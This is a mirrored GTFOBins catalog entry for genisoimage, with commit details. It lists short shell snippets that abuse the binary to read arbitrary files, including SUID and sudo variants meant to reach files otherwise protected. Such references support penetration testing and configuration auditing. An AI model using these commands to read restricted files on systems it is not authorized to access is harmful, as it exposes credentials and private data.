1
0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-09-16 17:01:38 +02:00
GTFOBins.github.io/_gtfobins/genisoimage.md
goproslowyo 9251c6a603
Add genisoimage suid
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
2021-12-17 14:44:54 +01:00

18 lines
632 B
Markdown

---
description: The output is placed inside the ISO9660 file system binary format thus it may not be suitable for binary content as is, yet it can be mounted or extracted with tools like `7z`.
functions:
file-read:
- code: |
LFILE=file_to_read
genisoimage -q -o - "$LFILE"
suid:
- description: The file is parsed, and some of its content is disclosed by the error messages, thus this might not be suitable to read arbitrary data.
code: |
LFILE=file_to_read
./genisoimage -sort "$LFILE"
sudo:
- code: |
LFILE=file_to_read
sudo genisoimage -q -o - "$LFILE"
---